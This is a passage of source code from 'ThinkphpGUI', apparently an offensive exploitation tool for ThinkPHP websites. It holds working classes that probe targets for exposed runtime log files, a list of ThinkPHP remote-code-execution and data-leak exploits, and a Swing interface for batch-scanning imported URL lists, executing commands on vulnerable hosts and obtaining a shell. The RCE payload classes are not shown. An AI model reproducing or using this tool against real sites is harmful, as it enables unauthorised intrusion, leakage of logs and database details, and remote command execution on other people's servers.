Author 莲花 2021/6/27 12 | */ 13 | public class tp5_log implements BasePayload { 14 | @Override 15 | public Result checkVUL(String url) throws Exception { 16 | String CheckStr = "[ info ]"; 17 | String CheckErr = "[ error ]"; 18 | Date dt = new Date(); 19 | String year = String.format("%tY", dt); 20 | String mon = String.format("%tm", dt); 21 | String day = String.format("%td", dt); 22 | ArrayList payload_urls = new ArrayList() {{ 23 | add(url + "/runtime/log/" + year + mon + "/" + day + ".log"); 24 | add(url + "/runtime/log/" + year + mon + "/" + day + "_cli.log"); 25 | add(url + "/runtime/log/" + year + mon + "/" + day + "_error.log"); 26 | add(url + "/runtime/log/" + year + mon + "/" + day + "_sql.log"); 27 | }}; 28 | try { 29 | for (String payload_url : payload_urls) { 30 | String res = HttpRequest.get(payload_url).body(); 31 | if (res.contains(CheckStr) || res.contains(CheckErr)) { 32 | return new Result(true, "ThinkPHP 5.x 日志泄露", payload_url); 33 | } 34 | } 35 | 36 | } catch (Exception e) { 37 | e.printStackTrace(); 38 | } 39 | 40 | return new Result(false, "ThinkPHP 5.x 日志泄露", ""); 41 | } 42 | 43 | @Override 44 | public Result exeVUL(String url, String cmd) throws Exception { 45 | return new Result(false, "", ""); 46 | } 47 | 48 | @Override 49 | public Result getShell(String url) throws Exception { 50 | return new Result(false, "", ""); 51 | } 52 | } 53 | -------------------------------------------------------------------------------- /ThinkphpGUI/src/main/java/exploit/tp6_log.java: -------------------------------------------------------------------------------- 1 | package exploit; 2 | 3 | import com.github.kevinsawicki.http.HttpRequest; 4 | import util.BasePayload; 5 | import util.Result; 6 | 7 | import java.util.ArrayList; 8 | import java.util.Date; 9 | 10 | /** 11 | * Author 莲花 2021/9/12 12 | */ 13 | public class tp6_log implements BasePayload { 14 | @Override 15 | public Result checkVUL(String url) throws Exception { 16 | Date dt = new Date(); 17 | String year = String.format("%tY", dt); 18 | String CheckStr = "RunTime"; 19 | String CheckErr = "[ error ]"; 20 | String mon = String.format("%tm", dt); 21 | String day = String.format("%td", dt); 22 | String suffix1 = year + mon + "/" + day + ".log"; 23 | ArrayList payload_urls = new ArrayList() {{ 24 | add(url + "/runtime/log/" + suffix1); 25 | add(url + "/runtime/log/Home/" + suffix1); 26 | add(url + "/runtime/log/Common/" + suffix1); 27 | add(url + "/runtime/log/Admin/" + suffix1); 28 | }}; 29 | try { 30 | for (String payload_url : payload_urls) { 31 | System.out.println(payload_url); 32 | String res = HttpRequest.get(payload_url).body(); 33 | if (res.contains(CheckStr) || res.contains(CheckErr)) { 34 | return new Result(true, "ThinkPHP 6.x 日志泄露", payload_url); 35 | } 36 | } 37 | } catch (Exception e) { 38 | e.printStackTrace(); 39 | } 40 | return new Result(false, "ThinkPHP 6.x 日志泄露", ""); 41 | } 42 | 43 | @Override 44 | public Result exeVUL(String url, String cmd) throws Exception { 45 | return new Result(false, "", ""); 46 | } 47 | 48 | @Override 49 | public Result getShell(String url) throws Exception { 50 | return new Result(false, "", ""); 51 | } 52 | } 53 | -------------------------------------------------------------------------------- /ThinkphpGUI/src/main/java/util/BasePayload.java: -------------------------------------------------------------------------------- 1 | package util; 2 | 3 | /** 4 | * Author 莲花 2021/6/15 5 | */ 6 | public interface BasePayload { 7 | Result checkVUL(String url) throws Exception; 8 | Result exeVUL(String url,String cmd) throws Exception; 9 | Result getShell(String url) throws Exception; 10 | } 11 | -------------------------------------------------------------------------------- /ThinkphpGUI/src/main/java/util/Exp_list.java: -------------------------------------------------------------------------------- 1 | package util; 2 | 3 | import java.util.ArrayList; 4 | import java.util.List; 5 | 6 | /** 7 | * Author 莲花 2021/6/15 8 | */ 9 | public class Exp_list { 10 | public static List get_exp() { 11 | List list = new ArrayList(); 12 | list.add("ThinkPHP 5.0 RCE"); 13 | list.add("ThinkPHP 5.0.10 RCE"); 14 | list.add("ThinkPHP 5.0.22/5.1.29 RCE"); 15 | list.add("ThinkPHP 5.0.23 RCE"); 16 | list.add("ThinkPHP 5.0.24-5.1.30 RCE"); 17 | list.add("ThinkPHP 5.x 数据库信息泄露"); 18 | list.add("ThinkPHP 5.x 日志泄露"); 19 | list.add("ThinkPHP 3.x RCE"); 20 | list.add("ThinkPHP 3.x 日志泄露"); 21 | list.add("ThinkPHP 3.x Log RCE"); 22 | list.add("ThinkPHP 6.x 日志泄露"); 23 | return list; 24 | } 25 | } 26 | -------------------------------------------------------------------------------- /ThinkphpGUI/src/main/java/util/Module.java: -------------------------------------------------------------------------------- 1 | package util; 2 | 3 | import com.github.kevinsawicki.http.HttpRequest; 4 | 5 | import java.util.ArrayList; 6 | 7 | /** 8 | * Author 莲花 2021/6/15 9 | */ 10 | public class Module { 11 | public String getModule(String url) { 12 | ArrayList list = new ArrayList() {{ 13 | add("manage"); 14 | add("admin"); 15 | add("api"); 16 | }}; 17 | String mod = "index"; 18 | for (int i = 0; i < list.size(); i++) { 19 | try { 20 | int code = HttpRequest.get(url + "/?s=/" + list.get(i)).code(); 21 | if (code == 200) { 22 | mod = list.get(i); 23 | } 24 | } catch (Exception e) { 25 | e.printStackTrace(); 26 | } 27 | } 28 | return mod; 29 | } 30 | } 31 | -------------------------------------------------------------------------------- /ThinkphpGUI/src/main/java/util/Result.java: -------------------------------------------------------------------------------- 1 | package util; 2 | 3 | /** 4 | * Author 莲花 2021/6/15 5 | */ 6 | public class Result { 7 | boolean res; 8 | String payload; 9 | String vuln; 10 | 11 | public boolean isRes() { 12 | return res; 13 | } 14 | 15 | public void setRes(boolean res) { 16 | this.res = res; 17 | } 18 | 19 | public String getPayload() { 20 | return payload; 21 | } 22 | 23 | public void setPayload(String payload) { 24 | this.payload = payload; 25 | } 26 | 27 | public String getVuln() { 28 | return vuln; 29 | } 30 | 31 | public void setVuln(String vuln) { 32 | this.vuln = vuln; 33 | } 34 | 35 | public Result(boolean res, String vuln,String payload) { 36 | this.res = res; 37 | this.payload = payload; 38 | this.vuln = vuln; 39 | } 40 | 41 | } 42 | -------------------------------------------------------------------------------- /ThinkphpGUI/src/main/java/util/Tools.java: -------------------------------------------------------------------------------- 1 | package util; 2 | 3 | import exploit.*; 4 | 5 | import java.io.BufferedReader; 6 | import java.io.FileReader; 7 | import java.io.IOException; 8 | import java.util.ArrayList; 9 | import java.util.List; 10 | 11 | /** 12 | * Author 莲花 2021/6/15 13 | */ 14 | public class Tools { 15 | 16 | public static boolean checkTheURL(String weburl) { 17 | if (!weburl.startsWith("http")) { 18 | return false; 19 | } 20 | return true; 21 | } 22 | 23 | 24 | public static BasePayload getPayload(String select) { 25 | BasePayload bp = null; 26 | Exp_list list = new Exp_list(); 27 | List exp_list = list.get_exp(); 28 | if (select.startsWith((String) exp_list.get(0))) { 29 | bp = new tp50(); 30 | } 31 | if (select.startsWith((String) exp_list.get(1))) { 32 | bp = new tp5010(); 33 | } 34 | if (select.startsWith((String) exp_list.get(2))) { 35 | bp = new tp5022_5129(); 36 | } 37 | if (select.startsWith((String) exp_list.get(3))) { 38 | bp = new tp5023(); 39 | } 40 | if (select.startsWith((String) exp_list.get(4))) { 41 | bp = new tp5024_5130(); 42 | } 43 | if (select.startsWith((String) exp_list.get(5))) { 44 | bp = new tp5_db(); 45 | } 46 | if (select.startsWith((String) exp_list.get(6))) { 47 | bp = new tp5_log(); 48 | } 49 | if (select.startsWith((String) exp_list.get(7))) { 50 | bp = new tp3(); 51 | } 52 | if (select.startsWith((String) exp_list.get(8))) { 53 | bp = new tp3_log(); 54 | } 55 | if (select.startsWith((String) exp_list.get(9))) { 56 | bp = new tp3_log_rce(); 57 | }if (select.startsWith((String) exp_list.get(10))) { 58 | bp = new tp6_log(); 59 | } 60 | return bp; 61 | } 62 | 63 | public static String addTheURL(String weburl) { 64 | if (!weburl.startsWith("http")) { 65 | weburl = "http://" + weburl; 66 | } 67 | return weburl; 68 | } 69 | 70 | public static List read_file(String file) throws IOException { 71 | List list = new ArrayList(); 72 | try { 73 | BufferedReader br = new BufferedReader(new FileReader(file)); 74 | String url; 75 | while ((url = br.readLine()) != null) { 76 | url = addTheURL(url); 77 | list.add(url); 78 | } 79 | br.close(); 80 | } catch (Exception e) { 81 | e.printStackTrace(); 82 | } 83 | return list; 84 | } 85 | } 86 | -------------------------------------------------------------------------------- /ThinkphpGUI/src/main/java/view/tp_view.java: -------------------------------------------------------------------------------- 1 | /* 2 | * Created by JFormDesigner on Tue Mar 23 11:02:35 CST 2021 3 | */ 4 | 5 | package view; 6 | 7 | import util.BasePayload; 8 | import util.Result; 9 | import util.Tools; 10 | 11 | import javax.swing.*; 12 | import java.awt.*; 13 | import java.awt.event.ActionEvent; 14 | import java.io.File; 15 | import java.util.ArrayList; 16 | import java.util.List; 17 | 18 | public class tp_view extends JFrame { 19 | 20 | public void loginfo(String info) { 21 | this.infores_txt.append(info + "\r\n"); 22 | infores_txt.paintImmediately(infores_txt.getBounds()); 23 | } 24 | 25 | public void logcmd(String info) { 26 | this.cmdres_txt.append(info); 27 | cmdres_txt.paintImmediately(cmdres_txt.getBounds()); 28 | } 29 | 30 | private void clear(ActionEvent e) { 31 | infores_txt.setText(""); 32 | cmdres_txt.setText(""); 33 | } 34 | 35 | private void check_url(ActionEvent e) throws Exception { 36 | boolean standard = Tools.checkTheURL(this.url_txt.getText()); 37 | if (standard) { 38 | check_vul(e); 39 | } else { 40 | JOptionPane.showMessageDialog(null, "URL格式不符合要求,示例:http://127.0.0.1:7001", "URL检查", JOptionPane.WARNING_MESSAGE); 41 | } 42 | } 43 | 44 | 45 | public void check_vul(ActionEvent e) throws Exception { 46 | this.test_btn.setEnabled(false); 47 | String url = this.url_txt.getText(); 48 | String version = this.comboBox.getSelectedItem().toString(); 49 | 50 | if (version.startsWith("ALL")) { 51 | loginfo("检测所有漏洞中......"); 52 | ArrayList versions = new ArrayList() {{ 53 | add("ThinkPHP 5.0 RCE"); 54 | add("ThinkPHP 5.0.10 RCE"); 55 | add("ThinkPHP 5.0.22/5.1.29 RCE"); 56 | add("ThinkPHP 5.0.23 RCE"); 57 | add("ThinkPHP 5.0.24-5.1.30 RCE"); 58 | add("ThinkPHP 3.x RCE"); 59 | add("ThinkPHP 5.x 数据库信息泄露"); 60 | add("ThinkPHP 3.x Log RCE"); 61 | add("ThinkPHP 5.x 日志泄露"); 62 | add("ThinkPHP 3.x 日志泄露"); 63 | add("ThinkPHP 6.x 日志泄露"); 64 | }}; 65 | for (String v : versions) { 66 | BasePayload bp = Tools.getPayload(v); 67 | Result vul = bp.checkVUL(url); 68 | if (vul.isRes()) { 69 | loginfo("[+] 存在" + vul.getVuln()); 70 | loginfo("Payload: " + vul.getPayload()); 71 | } else { 72 | loginfo("[-] 不存在" + vul.getVuln()); 73 | } 74 | } 75 | } else { 76 | loginfo("检测漏洞 " + version + "中......"); 77 | BasePayload bp = Tools.getPayload(version); 78 | Result vul = bp.checkVUL(url); 79 | if (vul.isRes()) { 80 | loginfo("[+] 存在" + vul.getVuln()); 81 | loginfo("Payload: " + vul.getPayload()); 82 | } else { 83 | loginfo("[-] 不存在" + vul.getVuln()); 84 | } 85 | } 86 | this.test_btn.setEnabled(true); 87 | } 88 | 89 | public void exe_vul(ActionEvent e) throws Exception { 90 | this.fun_btn.setEnabled(false); 91 | String url = this.url_txt.getText(); 92 | String version = this.comboBox.getSelectedItem().toString(); 93 | String cmd = this.cmd_txt.getText(); 94 | String res = null; 95 | 96 | if (version.startsWith("ALL")) { 97 | JOptionPane.showMessageDialog(null, "请选择漏洞对应版本!", "信息", JOptionPane.WARNING_MESSAGE); 98 | } else { 99 | BasePayload bp = Tools.getPayload(version); 100 | Result vul = bp.exeVUL(url, cmd); 101 | if (vul.isRes()) { 102 | res = vul.getPayload(); 103 | logcmd("[+] " + res); 104 | } else { 105 | JOptionPane.showMessageDialog(null, "命令执行失败!", "信息", JOptionPane.WARNING_MESSAGE); 106 | } 107 | } 108 | this.fun_btn.setEnabled(true); 109 | } 110 | 111 | 112 | public void getShell(ActionEvent e) throws Exception { 113 | this.getshell_btn.setEnabled(false); 114 | String url = this.url_txt.getText(); 115 | String version = this.comboBox.getSelectedItem().toString(); 116 | String res = null; 117 | 118 | if (version.startsWith("ALL")) { 119 | JOptionPane.showMessageDialog(null, "请选择漏洞对应版本!", "信息", JOptionPane.WARNING_MESSAGE); 120 | } else { 121 | BasePayload bp = Tools.getPayload(version); 122 | Result vul = bp.getShell(url); 123 | if (vul.isRes()) { 124 | res = vul.getPayload(); 125 | loginfo("[+] " + res); 126 | } else { 127 | JOptionPane.showMessageDialog(null, "Getshell失败", "信息", JOptionPane.WARNING_MESSAGE); 128 | } 129 | } 130 | this.getshell_btn.setEnabled(true); 131 | } 132 | 133 | List list_url = new ArrayList(); 134 | 135 | public void batch_import_url(ActionEvent e) throws Exception { 136 | JFileChooser jf = new JFileChooser(); 137 | jf.setFileSelectionMode(JFileChooser.FILES_ONLY); 138 | jf.showDialog(new JLabel(), "选择"); 139 | File file = jf.getSelectedFile(); 140 | if (file != null) { 141 | this.file_txt.setText(file.getAbsolutePath()); 142 | list_url = Tools.read_file(file.getAbsolutePath()); 143 | JOptionPane.showMessageDialog(null, "成功导入" + list_url.size() + "个URL!", "导入URL", JOptionPane.INFORMATION_MESSAGE); 144 | } 145 | } 146 | 147 | public void batch_check_url(ActionEvent e) throws Exception { 148 | this.test_btn.setEnabled(false); 149 | String version = this.comboBox.getSelectedItem().toString(); 150 | if (list_url.size() > 0) { 151 | if (version.startsWith("ALL")) { 152 | ArrayList versions = new ArrayList() {{ 153 | add("ThinkPHP 5.0 RCE"); 154 | add("ThinkPHP 5.0.10 RCE"); 155 | add("ThinkPHP 5.0.22/5.1.29 RCE"); 156 | add("ThinkPHP 5.0.23 RCE"); 157 | add("ThinkPHP 5.0.24-5.1.30 RCE"); 158 | add("ThinkPHP 5.x 数据库信息泄露"); 159 | add("ThinkPHP 5.x 日志泄露"); 160 | add("ThinkPHP 3.x RCE"); 161 | add("ThinkPHP 3.x 日志泄露"); 162 | add("ThinkPHP 3.x Log RCE"); 163 | add("ThinkPHP 6.x 日志泄露"); 164 | }}; 165 | for (int j = 0; j < list_url.size(); j++) { 166 | loginfo("检测URL " + list_url.get(j) + "中......"); 167 | for (String v : versions) { 168 | BasePayload bp = Tools.getPayload(v); 169 | Result vul = bp.checkVUL(list_url.get(j)); 170 | if (vul.isRes()) { 171 | loginfo("[+] 存在" + vul.getVuln()); 172 | loginfo("Payload: " + vul.getPayload()); 173 | } else { 174 | loginfo("[-] 不存在" + vul.getVuln()); 175 | } 176 | } 177 | } 178 | } else { 179 | BasePayload bp = Tools.getPayload(version); 180 | for (int j = 0; j < list_url.size(); j++) { 181 | if (j!=0) { 182 | loginfo(""); 183 | } 184 | loginfo("检测URL " + list_url.get(j) + "中......"); 185 | Result isvul = bp.checkVUL(list_url.get(j)); 186 | if (isvul.isRes()) { 187 | loginfo("[+] 存在" + isvul.getVuln()); 188 | loginfo("Payload: " + isvul.getPayload()); 189 | } else { 190 | loginfo("[-] 不存在" + isvul.getVuln()); 191 | } 192 | } 193 | } 194 | 195 | } else { 196 | JOptionPane.showMessageDialog(null, "请先导入URL!", "URL批量检查", JOptionPane.WARNING_MESSAGE); 197 | } 198 | this.test_btn.setEnabled(true); 199 | } 200 | 201 | public tp_view() { 202 | initComponents(); 203 | } 204 | 205 | private void initComponents() { 206 | // JFormDesigner - Component initialization - DO NOT MODIFY //GEN-BEGIN:initComponents 207 | label1 = new JLabel(); 208 | url_txt = new JTextField(); 209 | label2 = new JLabel(); 210 | test_btn = new JButton(); 211 | comboBox = new JComboBox<>(); 212 | textArea1 = new JTextArea(); 213 | clear_btn = new JButton(); 214 | tabbedPane1 = new JTabbedPane(); 215 | panel1 = new JPanel(); 216 | scrollPane1 = new JScrollPane(); 217 | infores_txt = new JTextArea(); 218 | panel2 = new JPanel(); 219 | label4 = new JLabel(); 220 | cmd_txt = new JTextField(); 221 | fun_btn = new JButton(); 222 | scrollPane2 = new JScrollPane(); 223 | cmdres_txt = new JTextArea(); 224 | label3 = new JLabel(); 225 | file_txt = new JTextField(); 226 | import_btn = new JButton(); 227 | batch_test_btn = new JButton(); 228 | getshell_btn = new JButton(); 229 | 230 | //======== this ======== 231 | setTitle("ThinkphpGUI By \u83b2\u82b1"); 232 | setMinimumSize(new Dimension(0, 22)); 233 | Container contentPane = getContentPane(); 234 | 235 | //---- label1 ---- 236 | label1.setText("URL:"); 237 | 238 | //---- url_txt ---- 239 | url_txt.setText("http://127.0.0.1"); 240 | 241 | //---- label2 ---- 242 | label2.setText("\u7248\u672c:"); 243 | 244 | //---- test_btn ---- 245 | test_btn.setText("\u68c0\u6d4b"); 246 | test_btn.addActionListener(e -> { 247 | try { 248 | check_url(e); 249 | } catch (Exception ex) { 250 | ex.printStackTrace(); 251 | } 252 | }); 253 | 254 | //---- comboBox ---- 255 | comboBox.setModel(new DefaultComboBoxModel<>(new String[] { 256 | "ThinkPHP 5.0 RCE", 257 | "ThinkPHP 5.0.10 RCE", 258 | "ThinkPHP 5.0.22/5.1.29 RCE", 259 | "ThinkPHP 5.0.23 RCE", 260 | "ThinkPHP 5.0.24-5.1.30 RCE", 261 | "ThinkPHP 5.x \u6570\u636e\u5e93\u4fe1\u606f\u6cc4\u9732", 262 | "ThinkPHP 5.x \u65e5\u5fd7\u6cc4\u9732", 263 | "ThinkPHP 3.x RCE", 264 | "ThinkPHP 3.x \u65e5\u5fd7\u6cc4\u9732", 265 | "ThinkPHP 3.x Log RCE", 266 | "ThinkPHP 6.x \u65e5\u5fd7\u6cc4\u9732", 267 | "ALL" 268 | })); 269 | 270 | //---- clear_btn ---- 271 | clear_btn.setText("Clear"); 272 | clear_btn.addActionListener(e -> clear(e)); 273 | 274 | //======== tabbedPane1 ======== 275 | { 276 | 277 | //======== panel1 ======== 278 | { 279 | 280 | //======== scrollPane1 ======== 281 | { 282 | scrollPane1.setViewportView(infores_txt); 283 | } 284 | 285 | GroupLayout panel1Layout = new GroupLayout(panel1); 286 | panel1.setLayout(panel1Layout); 287 | panel1Layout.setHorizontalGroup( 288 | panel1Layout.createParallelGroup() 289 | .addComponent(scrollPane1, GroupLayout.DEFAULT_SIZE, 801, Short.MAX_VALUE) 290 | ); 291 | panel1Layout.setVerticalGroup( 292 | panel1Layout.createParallelGroup() 293 | .addComponent(scrollPane1, GroupLayout.DEFAULT_SIZE, 481, Short.MAX_VALUE) 294 | ); 295 | } 296 | tabbedPane1.addTab("\u4fe1\u606f", panel1); 297 | 298 | //======== panel2 ======== 299 | { 300 | 301 | //---- label4 ---- 302 | label4.setText("CMD:"); 303 | 304 | //---- cmd_txt ---- 305 | cmd_txt.setText("whoami"); 306 | 307 | //---- fun_btn ---- 308 | fun_btn.setText("\u6267\u884c"); 309 | fun_btn.addActionListener(e -> { 310 | try { 311 | exe_vul(e); 312 | } catch (Exception ex) { 313 | ex.printStackTrace(); 314 | } 315 | }); 316 | 317 | //======== scrollPane2 ======== 318 | { 319 | scrollPane2.setViewportView(cmdres_txt); 320 | } 321 | 322 | GroupLayout panel2Layout = new GroupLayout(panel2); 323 | panel2.setLayout(panel2Layout); 324 | panel2Layout.setHorizontalGroup( 325 | panel2Layout.createParallelGroup() 326 | .addGroup(panel2Layout.createSequentialGroup() 327 | .addContainerGap() 328 | .addComponent(label4, GroupLayout.PREFERRED_SIZE, 35, GroupLayout.PREFERRED_SIZE) 329 | .addPreferredGap(LayoutStyle.ComponentPlacement.RELATED) 330 | .addComponent(cmd_txt, GroupLayout.PREFERRED_SIZE, 537, GroupLayout.PREFERRED_SIZE) 331 | .addGap(34, 34, 34) 332 | .addComponent(fun_btn) 333 | .addContainerGap(105, Short.MAX_VALUE)) 334 | .addComponent(scrollPane2, GroupLayout.DEFAULT_SIZE, 801, Short.MAX_VALUE) 335 | ); 336 | panel2Layout.setVerticalGroup( 337 | panel2Layout.createParallelGroup() 338 | .addGroup(panel2Layout.createSequentialGroup() 339 | .addGroup(panel2Layout.createParallelGroup(GroupLayout.Alignment.BASELINE) 340 | .addComponent(label4, GroupLayout.PREFERRED_SIZE, 39, GroupLayout.PREFERRED_SIZE) 341 | .addComponent(cmd_txt, GroupLayout.PREFERRED_SIZE, GroupLayout.DEFAULT_SIZE, GroupLayout.PREFERRED_SIZE) 342 | .addComponent(fun_btn)) 343 | .addPreferredGap(LayoutStyle.ComponentPlacement.RELATED) 344 | .addComponent(scrollPane2, GroupLayout.DEFAULT_SIZE, 436, Short.MAX_VALUE)) 345 | ); 346 | } 347 | tabbedPane1.addTab("\u547d\u4ee4\u6267\u884c", panel2); 348 | } 349 | 350 | //---- label3 ---- 351 | label3.setText("\u8def\u5f84\uff1a"); 352 | 353 | //---- import_btn ---- 354 | import_btn.setText("\u5bfc\u5165"); 355 | import_btn.addActionListener(e -> { 356 | try { 357 | batch_import_url(e); 358 | } catch (Exception ex) { 359 | ex.printStackTrace(); 360 | } 361 | }); 362 | 363 | //---- batch_test_btn ---- 364 | batch_test_btn.setText("\u6279\u91cf\u68c0\u6d4b"); 365 | batch_test_btn.addActionListener(e -> { 366 | try { 367 | batch_check_url(e); 368 | } catch (Exception ex) { 369 | ex.printStackTrace(); 370 | } 371 | }); 372 | 373 | //---- getshell_btn ---- 374 | getshell_btn.setText("GetSehll"); 375 | getshell_btn.addActionListener(e -> { 376 | try { 377 | getShell(e); 378 | } catch (Exception ex) { 379 | ex.printStackTrace(); 380 | } 381 | }); 382 | 383 | GroupLayout contentPaneLayout = new GroupLayout(contentPane); 384 | contentPane.setLayout(contentPaneLayout); 385 | contentPaneLayout.setHorizontalGroup( 386 | contentPaneLayout.createParallelGroup() 387 | .addGroup(contentPaneLayout.createSequentialGroup() 388 | .addGap(32, 32, 32) 389 | .addGroup(contentPaneLayout.createParallelGroup() 390 | .addGroup(contentPaneLayout.createSequentialGroup() 391 | .addGroup(contentPaneLayout.createParallelGroup() 392 | .addComponent(label1, GroupLayout.PREFERRED_SIZE, 35, GroupLayout.PREFERRED_SIZE) 393 | .addComponent(label3)) 394 | .addPreferredGap(LayoutStyle.ComponentPlacement.RELATED) 395 | .addGroup(contentPaneLayout.createParallelGroup() 396 | .addGroup(contentPaneLayout.createSequentialGroup() 397 | .addGap(57, 57, 57) 398 | .addComponent(textArea1, GroupLayout.PREFERRED_SIZE, GroupLayout.DEFAULT_SIZE, GroupLayout.PREFERRED_SIZE) 399 | .addGap(91, 733, Short.MAX_VALUE)) 400 | .addGroup(contentPaneLayout.createSequentialGroup() 401 | .addGroup(contentPaneLayout.createParallelGroup() 402 | .addGroup(contentPaneLayout.createSequentialGroup() 403 | .addComponent(url_txt, GroupLayout.PREFERRED_SIZE, 264, GroupLayout.PREFERRED_SIZE) 404 | .addGap(18, 18, 18) 405 | .addComponent(label2, GroupLayout.PREFERRED_SIZE, 36, GroupLayout.PREFERRED_SIZE)) 406 | .addGroup(contentPaneLayout.createSequentialGroup() 407 | .addComponent(file_txt, GroupLayout.PREFERRED_SIZE, 266, GroupLayout.PREFERRED_SIZE) 408 | .addPreferredGap(LayoutStyle.ComponentPlacement.RELATED) 409 | .addComponent(import_btn, GroupLayout.PREFERRED_SIZE, 60, GroupLayout.PREFERRED_SIZE))) 410 | .addGroup(contentPaneLayout.createParallelGroup() 411 | .addGroup(contentPaneLayout.createSequentialGroup() 412 | .addGap(16, 16, 16) 413 | .addComponent(comboBox, GroupLayout.PREFERRED_SIZE, 250, GroupLayout.PREFERRED_SIZE)) 414 | .addGroup(contentPaneLayout.createSequentialGroup() 415 | .addGap(18, 18, 18) 416 | .addComponent(batch_test_btn))) 417 | .addGap(32, 32, 32) 418 | .addGroup(contentPaneLayout.createParallelGroup() 419 | .addGroup(contentPaneLayout.createSequentialGroup() 420 | .addComponent(test_btn, GroupLayout.PREFERRED_SIZE, 57, GroupLayout.PREFERRED_SIZE) 421 | .addPreferredGap(LayoutStyle.ComponentPlacement.UNRELATED) 422 | .addComponent(clear_btn, GroupLayout.PREFERRED_SIZE, 57, GroupLayout.PREFERRED_SIZE)) 423 | .addGroup(contentPaneLayout.createSequentialGroup() 424 | .addGap(6, 6, 6) 425 | .addComponent(getshell_btn, GroupLayout.PREFERRED_SIZE, 110, GroupLayout.PREFERRED_SIZE))) 426 | .addGap(0, 35, Short.MAX_VALUE)))) 427 | .addGroup(contentPaneLayout.createSequentialGroup() 428 | .addComponent(tabbedPane1, GroupLayout.PREFERRED_SIZE, 801, GroupLayout.PREFERRED_SIZE) 429 | .addGap(0, 35, Short.MAX_VALUE)))) 430 | ); 431 | contentPaneLayout.setVerticalGroup( 432 | contentPaneLayout.createParallelGroup() 433 | .addGroup(contentPaneLayout.createSequentialGroup() 434 | .addGap(12, 12, 12) 435 | .addGroup(contentPaneLayout.createParallelGroup(GroupLayout.Alignment.BASELINE) 436 | .addComponent(label1, GroupLayout.PREFERRED_SIZE, 39, GroupLayout.PREFERRED_SIZE) 437 | .addComponent(url_txt, GroupLayout.PREFERRED_SIZE, GroupLayout.DEFAULT_SIZE, GroupLayout.PREFERRED_SIZE) 438 | .addComponent(label2, GroupLayout.DEFAULT_SIZE, GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE) 439 | .addComponent(comboBox, GroupLayout.PREFERRED_SIZE, GroupLayout.DEFAULT_SIZE, GroupLayout.PREFERRED_SIZE) 440 | .addComponent(clear_btn) 441 | .addComponent(test_btn)) 442 | .addPreferredGap(LayoutStyle.ComponentPlacement.RELATED) 443 | .addGroup(contentPaneLayout.createParallelGroup() 444 | .addGroup(contentPaneLayout.createParallelGroup(GroupLayout.Alignment.BASELINE) 445 | .addComponent(label3, GroupLayout.PREFERRED_SIZE, 43, GroupLayout.PREFERRED_SIZE) 446 | .addComponent(file_txt, GroupLayout.PREFERRED_SIZE, GroupLayout.DEFAULT_SIZE, GroupLayout.PREFERRED_SIZE) 447 | .addComponent(import_btn) 448 | .addComponent(batch_test_btn)) 449 | .addComponent(getshell_btn, GroupLayout.DEFAULT_SIZE, GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE)) 450 | .addPreferredGap(LayoutStyle.ComponentPlacement.RELATED) 451 | .addComponent(tabbedPane1, GroupLayout.PREFERRED_SIZE, 513, GroupLayout.PREFERRED_SIZE) 452 | .addPreferredGap(LayoutStyle.ComponentPlacement.RELATED) 453 | .addComponent(textArea1, GroupLayout.PREFERRED_SIZE, GroupLayout.DEFAULT_SIZE, GroupLayout.PREFERRED_SIZE) 454 | .addGap(9, 9, 9)) 455 | ); 456 | pack(); 457 | setLocationRelativeTo(getOwner()); 458 | // JFormDesigner - End of component initialization //GEN-END:initComponents 459 | } 460 | 461 | // JFormDesigner - Variables declaration - DO NOT MODIFY //GEN-BEGIN:variables 462 | private JLabel label1; 463 | private JTextField url_txt; 464 | private JLabel label2; 465 | private JButton test_btn; 466 | private JComboBox comboBox; 467 | private JTextArea textArea1; 468 | private JButton clear_btn; 469 | private JTabbedPane tabbedPane1; 470 | private JPanel panel1; 471 | private JScrollPane scrollPane1; 472 | private JTextArea infores_txt; 473 | private JPanel panel2; 474 | private JLabel label4; 475 | private JTextField cmd_txt; 476 | private JButton fun_btn; 477 | private JScrollPane scrollPane2; 478 | private JTextArea cmdres_txt; 479 | private JLabel label3; 480 | private JTextField file_txt; 481 | private JButton import_btn; 482 | private JButton batch_test_btn; 483 | private JButton getshell_btn; 484 | // JFormDesigner - End of variables declaration //GEN-END:variables 485 | } 486 | -------------------------------------------------------------------------------- /ThinkphpGUI/src/main/java/view/tp_view.jfd: -------------------------------------------------------------------------------- 1 | JFDML JFormDesigner: "7.0.2.4.305" Java: "11.0.6" encoding: "UTF-8" 2 | 3 | new FormModel { 4 | contentType: "form/swing" 5 | root: new FormRoot { 6 | add( new FormWindow( "javax.swing.JFrame", new FormLayoutManager( class org.jdesktop.layout.GroupLayout ) { 7 | "$horizontalGroup": "par l {seq l {space :p:32:p, par l {seq {par l {comp label1:::p:35:p, comp label3:::p::p}, space :::p, par l {seq {space :p:57:p, comp textArea1:::p::p, space :91:733:x}, seq {par l {seq l {comp url_txt:::p:264:p, space s:::p, comp label2:::p:36:p}, seq l {comp file_txt:::p:266:p, space :::p, comp import_btn:::p:60:p}}, par l {seq l {space :p:16:p, comp comboBox:::p:250:p}, seq l {space s:::p, comp batch_test_btn:::p::p}}, space :p:32:p, par l {seq {comp test_btn:::p:57:p, space u:::p, comp clear_btn:::p:57:p}, seq {space :6:6:p, comp getshell_btn:::p:110:p}}, space :0:35:x}}}, seq {comp tabbedPane1:::p:801:p, space :0:35:x}}}}" 8 | "$verticalGroup": "par l {seq l {space :p:12:p, par b {comp label1::b:p:39:p, comp url_txt::b:p::p, comp label2::b:::x, comp comboBox::b:p::p, comp clear_btn::b:p::p, comp test_btn::b:p::p}, space :::p, par l {par b {comp label3::b:p:43:p, comp file_txt::b:p::p, comp import_btn::b:p::p, comp batch_test_btn::b:p::p}, comp getshell_btn::l:::x}, space :::p, comp tabbedPane1:::p:513:p, space :::p, comp textArea1:::p::p, space :p:9:p}}" 9 | } ) { 10 | name: "this" 11 | "title": "ThinkphpGUI By 莲花" 12 | "minimumSize": new java.awt.Dimension( 0, 22 ) 13 | add( new FormComponent( "javax.swing.JLabel" ) { 14 | name: "label1" 15 | "text": "URL:" 16 | } ) 17 | add( new FormComponent( "javax.swing.JTextField" ) { 18 | name: "url_txt" 19 | "text": "http://127.0.0.1" 20 | } ) 21 | add( new FormComponent( "javax.swing.JLabel" ) { 22 | name: "label2" 23 | "text": "版本:" 24 | } ) 25 | add( new FormComponent( "javax.swing.JButton" ) { 26 | name: "test_btn" 27 | "text": "检测" 28 | } ) 29 | add( new FormComponent( "javax.swing.JComboBox" ) { 30 | name: "comboBox" 31 | "model": new javax.swing.DefaultComboBoxModel { 32 | selectedItem: "ThinkPHP 